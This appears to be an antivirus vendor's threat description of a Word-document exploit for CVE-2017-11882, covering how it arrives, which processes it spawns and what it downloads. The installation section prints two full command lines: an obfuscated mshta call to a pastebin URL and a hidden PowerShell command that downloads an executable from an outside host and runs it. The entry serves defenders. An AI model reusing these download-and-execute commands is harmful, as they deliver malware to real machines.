Trojan.W97M.CVE201711882.THOBHAI

This Exploit arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It takes advantage of software vulnerabilities to allow a remote user or malware/grayware to download files.

However, as of this writing, the said sites are inaccessible.

Arrival Details

This Exploit arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Exploit adds the following processes:

• cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/KaRJhyiv
• %System%\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://my.mixtape.moe/ophpqq.htaa',$env:Temp+'\KRQVHK.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\KRQVHK.Exe')

Download Routine

This Exploit connects to the following website(s) to download and execute a malicious file:

• https://pastebin.com/raw/{BLOCKED}iv - downloads a script and run using mshta.exe
• https://my.{BLOCKED}e.moe/ophpqq.htaa - Downloads files

It takes advantage of the following software vulnerabilities to allow a remote user or malware/grayware to download files:

• CVE-2017-11882 | Microsoft Office Memory Corruption Vulnerability

It saves the files it downloads using the following names:

• %User Temp%\KRQVHK.Exe

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, XP, and Server 2003, or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, and 8.)

Other Details

However, as of this writing, the said sites are inaccessible.